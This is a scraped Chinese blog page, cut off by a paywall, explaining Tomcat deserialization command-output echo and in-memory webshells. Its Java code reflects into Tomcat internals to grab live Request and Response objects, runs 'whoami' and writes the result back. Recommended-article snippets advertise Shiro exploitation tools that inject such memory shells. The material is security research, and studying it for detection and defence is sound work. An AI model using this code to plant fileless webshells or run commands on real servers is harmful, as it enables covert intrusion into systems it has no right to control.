Java安全之反序列化回显与内存码,java核心编程视频教学

最新推荐文章于 2024-07-22 14:34:27 发布
最新推荐文章于 2024-07-22 14:34:27 发布
阅读量259 收藏
点赞数
分类专栏: 程序员 文章标签: 面试 java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64384302/article/details/121884246
版权
这篇博客深入探讨了如何利用Java中的反序列化和内存码来构造Tomcat内存马。作者详细介绍了如何通过反射修改Tomcat内部类的字段,以实现对Request和Response的控制,从而执行自定义命令。文中还提到在Shiro反序列化漏洞利用中的限制,并提供了一个完整的内存马构造过程。最后,文章展示了如何将这些技术整合到YSO(Yet Another Serialization of Objects)中,以便于在反序列化攻击中使用。
摘要由CSDN通过智能技术生成

org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(connector[0].getProtocolHandler(), null));

Field processors = Class.forName(“org.apache.coyote.RequestGroupInfo”).getDeclaredField(“processors”);

processors.setAccessible(true);

java.util.List RequestInfo_list = (java.util.List) processors.get(requestGroupInfo);

Field req = Class.forName(“org.apache.coyote.RequestInfo”).getDeclaredField(“req”);

req.setAccessible(true);

for (RequestInfo requestInfo : RequestInfo_list) {

org.apache.coyote.Request request1 = (org.apache.coyote.Request )req.get(requestInfo);

org.apache.catalina.connector.Request request2 = ( org.apache.catalina.connector.Request)request1.getNote(1);

org.apache.catalina.connector.Response response2 = request2.getResponse();

response2.getWriter().write(“111”);

InputStream whoami = Runtime.getRuntime().exec(“whoami”).getInputStream();

// BufferedInputStream bufferedInputStream = new BufferedInputStream(whoami);

BufferedInputStream bis = new BufferedInputStream(whoami);

int b ;

while ((b = bis.read())!=-1){

response2.getWriter().write(b);

}

}

}

}

} catch (NoSuchFieldException e) {

e.printStackTrace();

} catch (ClassNotFoundException e) {

e.printStackTrace();

} catch (IllegalAccessException e) {

e.printStackTrace();

} catch (NoSuchMethodException e) {

e.printStackTrace();

} catch (InvocationTargetException e) {

e.printStackTrace();

}

}

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {

this.doPost(request, response);

}

}

image.png

将命令执行结果使用获取到的Request和Response来输出。

坑点记录#

================================================================

  1. 开始想直接获取内部类发现思路不通,后来采用getDeclaredClasses方法获取某类中所有内部的内部类遍历,判断类名传递定位到该类。

  2. 获取global遍历的时候出现了巨坑,直接反射去获取。但是未意识到创建是一个class对象,反射使用get方法必须传递实例。

  3. 获取到Request需要调用request.getNote(1);转换为org.apache.catalina.connector.Request的对象。

  4. fanal修饰变量,需做修改,直接获取报错。

通过调用 org.apache.coyote.Request#getNote(ADAPTER_NOTES) 和 org.apache.coyote.Response#getNote(ADAPTER_NOTES) 来获取 org.apache.catalina.connector.Request 和 org.apache.catalina.connector.Response 对象

文章链接

0x02 Tomcat半通用回显#

============================================================================

基于Tomcat中一种半通用回显方法该篇文来调试一下。

根据前文思路顺着堆栈一路向下查看Request和Response存储位置,只要获取到一个实例即可。

顺着思路,在

org.apache.catalina.core.ApplicationFilterChain位置发现符合条件的变量。

image.png

下面寻找赋值位置,发现在这个位置对request,response进行实例的存储。但是默认为False

image.png

思路如下:

1、反射修改

ApplicationDispatcher.WRAP_SAME_OBJECT,让代码逻辑走到if条件里面

2、初始化lastServicedRequest和lastServicedResponse两个变量,默认为null

3、从lastServicedResponse中获取当前请求response,并且回显内容。

自己尝试构造了一下

package com;

import javax.servlet.ServletException;

import javax.servlet.ServletRequest;

import javax.servlet.ServletResponse;

import javax.servlet.annotation.WebServlet;

import javax.servlet.http.HttpServlet;

import javax.servlet.http.HttpServletRequest;

import javax.servlet.http.HttpServletResponse;

import java.io.IOException;

import java.lang.reflect.Field;

import java.lang.reflect.Modifier;

@WebServlet("/testServlet")

public class testServlet extends HttpServlet {

protected void doPost(HttpServletRequest request, HttpServletResponse response) {

try {

Field wrap_same_object = Class.forName(“org.apache.catalina.core.ApplicationDispatcher”).getDeclaredField(“WRAP_SAME_OBJECT”);

Field lastServicedRequest = Class.forName(“org.apache.catalina.core.ApplicationFilterChain”).getDeclaredField(“lastServicedRequest”);

Field lastServicedResponse = Class.forName(“org.apache.catalina.core.ApplicationFilterChain”).getDeclaredField(“lastServicedResponse”)

最低0.47元/天 解锁文章
m0_64384302
关注
专栏目录
Java反序列化和JNDI注入漏洞案例实战
悦分享
08-04 1010
CORBA全称(Common ObjectRequest Broker Architecture)也就是公共对象请求代理体系结构,是OMG(对象管理组织,一个非盈利性的计算机行业标准协会)制定的一种标准的面向对象应用程序体系规范。其提出是为了解决不同应用程序间的通信,曾是分布式计算的主流技术。CORBA标准主要分为三个部分,IDL(接口语言)、ORB(对象请求代理)、IIOP(ORB之间的操作协议)。其结构主要分为三部分:naming service、client side、servant side。...
Java安全反序列化回显内存java程序设计项目化教程课后题答案
m0_63174420的博客
11-10 440
所以获取request的处理请求是 Connector—>AbstractProtocol$ConnectoinHandler—>global—>RequestInfo—>Request—>Response 而在Tomcat启动过程红会将Connector放入Service中。 而现在获取完成的流程是 StandardService—>Connector—>AbstractProtocol$ConnectoinHandler—>RequestGroupInf
内存中的代
sjxbf的专栏
06-12 750
#include using namespace std;int a;int main(){ int i; unsigned char* c; a = 5; //00401358 mov dword ptr [a (00439490)],5 c = ((unsigned char*)0x00401358); //0x00401358 内存中a=5的起始地址 for (i = 0; i {
内存马检测排查手段_内存马查杀
最新发布
2401_84215240的博客
07-22 1686
内存马是无文件落地webshell中最常见的攻击手段,随着攻防演练对抗强度越来越高,流量分析、EDR等专业安全设备被蓝方广泛使用,传统的文件上传的webshll以及文件形式的后门容易被检测到,文件shell明显气数已尽,而内存马因其隐蔽性等优点从而越来越盛行。
tomcat存储过程_基于全局储存的新思路 | Tomcat的一种通用回显方法研究
weixin_39977642的博客
12-04 215
作者:Litch1,给phith0n师傅递茶的小弟起因对于不出网的反序列化回显,有利用Linux文件描述符的方法:《linux下java反序列化通杀回显方法的低配版实现》,思路比较巧妙,但有一些局限性,对比起来感觉response直接写回显会比较方便,但是其在通用性上也存在痛点:很多框架对于Serlvet进行了封装,不同框架实现不同,同一框架的不同版本实现也可能不同,因此我们无法利用一种...
java程序设计项目案例化教程题库及答案
m0_63394128的博客
08-04 5856
1、 Java源程序文件的后缀是 *.javaJava字节文件的后缀名称是 *.class 。2、 Java程序实现可移值性,依靠的是 JVM 。3、 Java语言的三个分支是: JAVA SE 、 JAVA ME 、 JAVA EE 。4、 Java程序由 类 组成,如果Java使用 public class 声明类,则文件名称必须与类名称一致。5、 Java执行是从 main() 方法开始执行的,此方法的完整定
结合反序列化注入tomcat内存
白帽子凯哥哥的博客
05-24 1114
通过前几个内存马的学习我们可以知道,将内存马写在jsp文件上传并不是传统意义上的内存马注入,jsp文件本质上就是一个servlet,servlet会编译成class文件,也会实现文件落地。借用木头师傅的一张图结合反序列化注入内存马是动态注入内存马的常用方法,然而通过反序列化注入的方式没有jsp文件的request内置类,所以获取回显的方式我们也需要考虑,在此写下这篇文章分析总结反序列化注入的方法细节。读者福利 |CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)
Java反序列化回显解决方案.docx
10-26
### Java反序列化回显解决方案 #### 前言 在信息安全领域,特别是渗透测试与安全研究中,Java反序列化漏洞是一个常见的攻击点。利用此类漏洞,攻击者可以执行远程代(RCE),对系统造成严重影响。然而,通常情况...
java序列回显学习.doc
07-08
Java序列化回显反序列化Java编程中涉及安全性和数据传输的重要概念。序列化是将对象的状态信息转换为可以存储或传输的形式的过程,而反序列化则是将这种形式还原为原来的对象状态。在一些不出网的场景下,利用...
TelnetClient.zip_Java编程_Java_
08-12
本教程将详细讲解如何使用Java编程语言实现一个简单的Telnet客户端,以便连接到远程服务器的Telnet服务。 首先,让我们了解什么是Telnet。Telnet是一个允许用户在本地计算机上与远程主机进行交互的协议,它在TCP/IP...
java程序设计项目教程课后答案~张兴科&季昌武
12-20
课后答案~java程序设计项目教程~ 中国人民大学出版社~张兴科~季昌武
shiro_attack:shiro反序列化进攻综合利用,包含(回显执行命令注入内存马)
03-11
shiro反序列化进攻综合利用 项目基于javafx,利用shiro反序列化扩展进行回显命令执行以及注入类别内存马 检出唯一密钥(SimplePrincipalCollection)cbc / gcm Tomcat / Springboot回显命令执行 集成公用集合K1 / K2 通过POST请求中defineClass字节实现注入内存马(Servlet实现参考哥斯拉内存马) resources目录下shiro_keys.txt可扩展键 关于内存马 某些spring环境以jar包启动写shell麻烦 渗透中找目录很烦,经常出现各种写壳浪费时间问题 无落地文件舒服 错误修复 2020.11.08 高低版本base64库不一致,当前使用org.apache.shiro.codec.Base64避免此问题 2020.11.10 修复注入内存马都显示注入成功的错误。 2020.11.23
Java程序设计教程习题答案
02-26
可以帮助我们解决一些课后的问题啊 来来啊
Shiro-EXP:Apache Shiro 反序列化漏洞检测与利用工具,一键注入内存
05-26
项目介绍 基于Apache Shiro反序列化漏洞进行利用链的探测,附内存马。 利用时需要修改POST请求两处数据,分别为Header头RememberMe字段值和携带的data数据(由于payload设定,data中须指定名字为c的参数值)。 探测到利用链后,根据提示,将屏幕输出的payload粘贴至POST请求Header头RememberMe字段处,至于data携带的数据,自行决策,本文文末附内存马,可直接粘贴至data中使用,或自行生成指定命令的字节片段替换。 与项目相关文章首发于: Shiro exp使用手册 Shiro rememberMe反序列化漏洞 漏洞原理 Apache Shiro框架提供了记住密的功能(RememberMe),用户登录成功后会生成经过加密并编的cookie,服务端对rememberMe的cookie值先base64解然后AES解密再反序列化,就导
[Java安全]—Tomcat反序列化注入回显内存
Sentiment的博客
12-03 1050
在之前学的tomcat filter、listener、servlet等内存马中,其实并不算真正意义上的内存马,因为Web服务器在编译jsp文件时生成了对应的class文件,因此进行了文件落地。所以本篇主要是针对于反序列化进行内存马注入来达到无文件落地的目的,而的和可以直接获取,但是反序列化的时候却不能,所以回显问题便需要考虑其中。既然无法直接获取request和response变量,所以就需要找一个存储请求信息的变量,根据kingkk师傅的思路,在中找到了: 并且这两个变量是静态的,因此省去了获取对象实例
Java反序列化回显解决方案
热门推荐
Summer's blog
06-12 1万+
于无常处知有情,于有情处知众生............... 学习无止境,努力就完事。
2024年网络安全最新Java安全反序列化回显内存(1),2024年最新从零开始学网络安全编程
2401_84519998的博客
05-12 1203
根据Litch1师傅的思路来寻找request,response对象全局存储的位置基于全局储存的新思路 | Tomcat的一种通用回显方法研究根据该文章思路得知,在Tomcat启动的时候会调用该位置的dorun方法由图可见,调用栈会来到创建Http11Processor对象这一步,Http11Processor继承AbstractProcessor类。而AbstractProcessor类中可见有Request,Response这两对象。并且为final修饰的,赋值后不可被更改。
Java反序列化注入内存
02-09 2535
Java内存马总体有Servlet/Filter/Listern/Java-Agent四种,前三种思路都差不多,通过不同方式获取到ApplicationContext/servletContext/StandardContext等对象,然后往ApplicationContext/servletContext/StandardContext注入恶意的Servlet/Filter/Listern,这里通过注入 Filter实现内存马。 实现一 通过Thread.currentThread().getContex
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值